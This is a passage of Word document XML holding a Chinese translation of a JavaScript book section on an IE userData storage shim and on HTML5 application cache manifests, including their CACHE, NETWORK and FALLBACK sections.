        <w:t>memory.load("UserDataStorage");//</w:t>
      </w:r>
      <w:r>
        <w:t>载入存储的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.getItem=function(key){//</w:t>
      </w:r>
      <w:r>
        <w:t>通过属性来获取保存的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t>urn memory.getAttribute(key)||null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.setItem=function(key,value){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.setAttribute(key,value);//</w:t>
      </w:r>
      <w:r>
        <w:t>以设置属性的形式来保存数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.save("UserDataStorage");//</w:t>
      </w:r>
      <w:r>
        <w:t>保存数据改变后的状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.removeItem=function(key){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.removeAttribute(key);//</w:t>
      </w:r>
      <w:r>
        <w:t>删除存储的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>memory.save("UserDataStorage");//</w:t>
      </w:r>
      <w:r>
        <w:t>再次保存状态</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由于上述代码只在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器下有效，最好使用</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>条件注释来避免其他浏览器载入上述代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--[if IE]</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script src="UserDataStorage.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>![endif]--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="517" w:name="20_4_Ying_Yong_Cheng_Xu_Cun_Chu_He_Li_Xi"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>20.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　应用程序存储和离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="517"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中新增了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序缓存</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用将应用程序自身本地保存到用户的浏览器中。不像</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>只是</w:t>
      </w:r>
      <w:r>
        <w:t>保存</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序相关的数据，它是将应用程序自身保存起来</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序所需运行的所有文件（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>、图片等）。</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序缓存</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和一般的浏览器缓存不同：它不会随着用户清除浏览器缓存而被清除。同时，缓存起来的应用程序也不会像一般固定大小的缓存那样，老数据会被最近一次访问的新数据代替掉。它其实不是临时存储在缓存中：应用程序更像是被</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>在那里，除非被用户</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>卸载</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>它们，否则它们就会一直</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>驻扎</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>在那里。所以，总的来说，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序缓存</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>在真正意义上不是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>缓存</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，更好的说法应该称</w:t>
      </w:r>
      <w:r>
        <w:t>之为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序存储</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用能够实现</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>本地安装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的目的是要保证它们能够在离线状态（比如，当在飞机上或者手机没信号的时候）下依然可访问。将自己</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到应用程序缓存中的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用，在离线状态下使用</w:t>
      </w:r>
      <w:r>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:t>来保存应用相关的数据，同时还具备一套同步机制，在再次回到在线状态的时候，能够将存储的数据传输给服务器。在</w:t>
      </w:r>
      <w:r>
        <w:t>20.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节我们会看到一个离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的例子。不过，在这之前，先来介绍下应用程序是如何将自己</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到应用程序缓存中的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="518" w:name="20_4_1_Ying_Yong_Cheng_Xu_Huan_Cun_Qing_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>20.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　应用程序缓存清单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="518"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>想要将应用程序</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>应用程序缓存中，首先要创建一个清单：包含了所有应用程序依赖的所有</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>列表。然后，通过在应用程序主</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面的＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签中设置</w:t>
      </w:r>
      <w:r>
        <w:t>manifest</w:t>
      </w:r>
      <w:r>
        <w:t>属性，指向到该清单文件就可以了：</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 manifest="myapp.appcache"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>...</w:t>
      </w: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清单文件中的首行内容必须以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"CACHE </w:t>
      </w:r>
      <w:r>
        <w:t>MANIFEST"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串开始。其余就是要缓存的文件</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>列表，一行一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。相对路径的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>都相对于清单文件的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。会忽略内容中的空行，会作为注释而忽略以</w:t>
      </w:r>
      <w:r>
        <w:t>“#”</w:t>
      </w:r>
      <w:r>
        <w:t>开始的行。注释前面可以有空格，但是在同一行注释后面是不允许有非空字符的。如下所示是一个简单的清单文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CACHE MANIFEST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>上一行标识此文件是一个清单文件。本行是注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>下面的内容都是应用程序依赖的资源文件的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>myapp.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>myapp.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>myapp.css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>images/background.png</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>缓存清单的</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>IME</w:t>
      </w:r>
      <w:r>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>应用程序缓存清单文件约定以</w:t>
      </w:r>
      <w:r>
        <w:t>.appcache</w:t>
      </w:r>
      <w:r>
        <w:t>作为文件扩展名。但是，这也仅仅只是约定而已，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器真正识别清单文件的方式是通过</w:t>
      </w:r>
      <w:r>
        <w:t>"text/cache-manifest"</w:t>
      </w:r>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型的一个清单。如果服务器将清单文件的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>的头信息设置成其他</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型，那么就不会缓存应用程序了。因此，可能需要对</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器做一定的配置来使用这个</w:t>
      </w:r>
      <w:r>
        <w:t>MIME</w:t>
      </w:r>
      <w:r>
        <w:t>类型，比如，在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用目录下创建</w:t>
      </w:r>
      <w:r>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的一个</w:t>
      </w:r>
      <w:r>
        <w:t>.htaccess</w:t>
      </w:r>
      <w:r>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>清单文件包含要缓存的应用的标识。如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用有很多</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面（用户可以访问多个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面），那么每个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面就需要设置＜</w:t>
      </w:r>
      <w:r>
        <w:t>html manifest=</w:t>
      </w:r>
      <w:r>
        <w:t>＞属性来指向清单文件。事实上，将这些不同的页面都指向同一个清单文件，可以很清楚地表达出它们都是需要缓存起来的，同时它们又是来自同一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的。如果一个应用只有少量的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>页面，那么一般会把这些页面都显式地列在清单文件中。但这不是强制的：会认为任何链接到清单文件的文件都是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的一部分，并会随着应用一起缓存起来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>像之前提到的，一个简单的清单必须列出</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用依赖的所有资源。一旦一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用首次</w:t>
      </w:r>
      <w:r>
        <w:t>下载下来并缓存，之后的任何加载请</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>求就都来自缓存。从缓存中去载入一个应用资源的时候，就要求它请求的任何资源务必要在清单中。不会载入不在清单中的资源。这种政策有点离线的味道。如果一个简单的缓存起来的应用能够从缓存中载入并运行，那么它也可以在浏览器的离线状态下运行。通常情况下，很多复杂的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用无法将它们依赖的所有资源都缓存起来。但是，如果它们同时也有一个复杂的清单的话，它们仍然可以使用应用程序缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>复杂的清单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个应用从应用程序缓存中载入的时候，只有其清单文件中列举出来的资源文件会载入。前面例子中的清单文件</w:t>
      </w:r>
      <w:r>
        <w:t>一次列举一个资源的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。事实上，清单文件还有比这更复杂的语法，列举资源的方式也还有另外两种。在清单文件中可以使用特殊的区域头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>来标识该头信息之后清单项的类型。像该例中列举的简单缓存项事实上都属于</w:t>
      </w:r>
      <w:r>
        <w:t>"CACHE:"</w:t>
      </w:r>
      <w:r>
        <w:t>区域，这也是默认的区域。另外两种区域是以</w:t>
      </w:r>
      <w:r>
        <w:t>"Network:"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"FALLBACK:"</w:t>
      </w:r>
      <w:r>
        <w:t>头信息开始的（一个清单可以有任意数量的区域，而且在相邻两个区域之间可以根据需要相互切换）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"NETWORK:"</w:t>
      </w:r>
      <w:r>
        <w:t>区域标识了该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的资源从不缓存，总要通过网络获取。通常，会将一些服务端的脚本资源放在</w:t>
      </w:r>
      <w:r>
        <w:t>"NETWO</w:t>
      </w:r>
      <w:r>
        <w:t>RK:"</w:t>
      </w:r>
      <w:r>
        <w:t>区域中，而实际上该区域中的资源的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>都只是</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>前缀，用来表示以此</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>前缀开头的资源都应该要通过网络加载。当然，如果浏览器处于离线状态，那么这些资源都将获取失败。</w:t>
      </w:r>
      <w:r>
        <w:t>"NETWORK:"</w:t>
      </w:r>
      <w:r>
        <w:t>区域中的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>还支持</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>通配符。该通配符表示对任何不在清单中的资源，浏览器都将通过网络加载。这实际上违背了这样一条规则：缓存应用程序必须要在清单中列举所有应用相关的资源！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"FALLBACK:"</w:t>
      </w:r>
      <w:r>
        <w:t>区域中的清单项每行都包含两个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。第二个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>是指需要加载和存储在缓存中的资源，第一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>是一个前缀。任何能够匹配到该前缀的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>都不会缓存起来，但是可能的话，它们会从网络中载入。如果从网络中载入这样一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>失败的话，就会使用第二个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的缓存资源来代替，从缓存中获取。想象一个</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用包含一定数量的视频教程。这些视频都很大，显然把它们缓存到本地是不合适的。因此，在离线状态下，通过清单文件中的</w:t>
      </w:r>
      <w:r>
        <w:t>fallback</w:t>
      </w:r>
      <w:r>
        <w:t>区域，就可以使用一些机遇文本的帮助文件来代替了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是一个更加复杂</w:t>
      </w:r>
      <w:r>
        <w:t>的缓存清单：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CACHE MANIFEST</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CACHE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>myapp.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>myapp.css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>myapp.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>FALLBACK:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>videos/offline_help.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>NETWORK:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cgi/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="519" w:name="20_4_2_Huan_Cun_De_Geng_Xin_"/>
      <w:r>
        <w:t>20.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　缓存的更新</w:t>
      </w:r>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
